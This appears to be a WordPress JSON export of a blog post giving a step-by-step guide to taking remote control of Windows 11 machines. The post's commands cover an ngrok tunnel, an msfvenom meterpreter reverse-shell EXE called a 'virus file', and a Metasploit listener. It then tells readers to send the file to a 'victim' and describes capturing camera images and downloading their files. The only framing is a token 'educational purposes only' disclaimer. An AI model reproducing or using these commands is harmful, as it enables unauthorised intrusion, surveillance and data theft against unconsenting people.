{"id":5953,"date":"2022-02-11T18:47:13","date_gmt":"2022-02-11T18:47:13","guid":{"rendered":"https:\/\/news4hacker.com\/?p=1194"},"modified":"2023-05-10T08:09:52","modified_gmt":"2023-05-10T08:09:52","slug":"how-to-hack-windows-11-with-metasploit","status":"publish","type":"post","link":"https:\/\/reconcybersecurity.com\/blogs\/how-to-hack-windows-11-with-metasploit\/","title":{"rendered":"How to Hack Windows 11 with Metasploit | Ethical Hacking"},"content":{"rendered":"\n<p>In this post, we are telling you how to hack windows 11 with <a href=\"https:\/\/reconcybersecurity\/blog\/category\/metasploit\/\">Metasploit<\/a> and control it using our system. We are going to use Metasploit&#8217;s Windows payload to make its virus file which will be in &#8221; exe &#8221; format. So let&#8217;s hack windows by Metasploit&#8230;<\/p>\n\n\n\n<p><strong>Disclaimer \u2013<\/strong> This blog is for educational purposes only, If you do anything illegal then we are not responsible for it\u2026<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"what-is-metasploit\"><strong>What Is Metasploit?<\/strong><\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-1 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:33.33%\">\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"501\" height=\"663\" src=\"https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031.png\" alt=\"How to Hack Windows 11\" class=\"wp-image-11021\" srcset=\"https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031.png 501w, https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031-227x300.png 227w, https:\/\/reconcybersecurity.com\/blogs\/wp-content\/uploads\/2023\/04\/kindpng_7930031-380x503.png 380w\" sizes=\"auto, (max-width: 501px) 100vw, 501px\" \/><\/figure>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:66.66%\">\n<p>The Metasploit Framework is an open-source powerful tool that is used by <a href=\"https:\/\/reconcybersecurity.com\/blogs\/\" target=\"_blank\" data-type=\"URL\" data-id=\"https:\/\/reconcybersecurity.com\/blogs\/\" rel=\"noreferrer noopener\">CyberCriminals<\/a> as well as Ethical-Hackers to find systematic vulnerabilities on networks and servers because it can be easily customized and used in most Linux operating systems.<\/p>\n\n\n\n<p>Metasploit came preinstalled in all Linux operating systems like Kali Linux, Parrot OS, etc. But if you don\u2019t have it then you can install it by typing ( <strong>sudo apt-get install metasploit-framework<\/strong> )\u2026<\/p>\n<\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"how-to-make-payload-with-metasploit\"><span id=\"how-to-hack-windows-11using-payload-with-metasploit\"><strong>How To hack windows 11using Payload With Metasploit?<\/strong><\/span><\/h2>\n\n\n\n<p>So 1st we have to create our ngrok server to use this ( <strong>windows exe virus file<\/strong> ) anywhere. For doing that come inside the directory where your ngrok is saved then type this command (<strong> .\/ngrok tcp 4242<\/strong> )\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220211_232143-1024x54.png\" alt=\"\" class=\"wp-image-1198\"\/><\/figure>\n\n\n\n<p><strong>Note \u2013 <\/strong>Read and type all commands very carefully because if you type a single wrong command then the Metasploit will not work\u2026<\/p>\n\n\n\n<p>Now we have to create a virus file in exe format by writing a payload command that will help us to gain access to our victim\u2019s computer. We are using the EXE format because it is used for running Windows applications&#8230;<\/p>\n\n\n\n<p>So open another terminal and write this metasploit payload ( <strong>msfvenom -p windows\/x64\/meterpreter\/reverse_tcp -f exe lhost=(YOUR NGROK LINK) lport=(YOUR NGROK PORT) -o .exe<\/strong> ). See the photo for better understanding\u2026<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220211_232349-1024x135.png\" alt=\"\" class=\"wp-image-1199\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220211_232512-1024x227.png\" alt=\"\" class=\"wp-image-1200\"\/><\/figure>\n\n\n\n<p><strong>Remember &#8211;<\/strong> You have to copy ngrok link from after double slash ( \/\/ ) till (<strong> .io<\/strong> ) to paste it in lhost.<\/p>\n\n\n\n<p>After that, you can see an ( <strong>exe file<\/strong> ) is built in your home directory. Now we have to create our listener which will help us to control our victim&#8217;s system&#8230;<\/p>\n\n\n\n<p><strong>Follow the commands below to create the Listener &#8211;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>msfconsole<\/code><\/li>\n\n\n\n<li><code>use expliot\/multi\/handler<\/code><\/li>\n\n\n\n<li><code>set payload windows\/x64\/meterpreter\/reverse_tcp<\/code><\/li>\n\n\n\n<li><code>set lhost 0.0.0.0<\/code><\/li>\n\n\n\n<li><code>set lport 4242<\/code><\/li>\n\n\n\n<li><code>exploit<\/code><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/reconcybersecurity.com\/wp-content\/uploads\/2022\/02\/Screenshot_20220211_232833-1024x160.png\" alt=\"\" class=\"wp-image-1201\"\/><\/figure>\n\n\n\n<p>Now everything is done, just send your virus file to your target and if he\/she will open it then we will get remote access to their windows\u2026<\/p>\n\n\n\n<p>So what we can do after gaining access to their System. For example \u2013 we can check their OS information, capture screenshots through their front camera, download files, etc&#8230;<\/p>\n\n\n\n<p><strong>Tips<\/strong> \u2013 You can type the ( <strong>help<\/strong> ) command in Metasploit for viewing all commands after hacking the victim&#8217;s windows&#8230;<\/p>\n\n\n\n<p class=\"has-text-align-center\"><strong>If you have any problem with our blog so you can comment to us we will try to fix it.<\/strong><\/p>\n\n\n\n<p class=\"has-text-align-right\">\u2013 Recon<\/p>\n","protected":false},"excerpt":{"rendered":"In this post, we are telling you how to hack windows 11 with Metasploit and control it using&hellip;\n","protected":false},"author":1,"featured_media":10850,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[92],"tags":[225,226,90,227,228],"class_list":{"0":"post-5953","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-metasploit","8":"tag-hack-windows","9":"tag-how-to-get-remote-access-of-windows","10":"tag-how-to-use-metasploit","11":"tag-windows-hacking","12":"tag-windows-hacking-with-metasploit"},"_links":{"self":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5953","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/comments?post=5953"}],"version-history":[{"count":3,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5953\/revisions"}],"predecessor-version":[{"id":11053,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/posts\/5953\/revisions\/11053"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media\/10850"}],"wp:attachment":[{"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/media?parent=5953"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/categories?post=5953"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reconcybersecurity.com\/blogs\/wp-json\/wp\/v2\/tags?post=5953"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}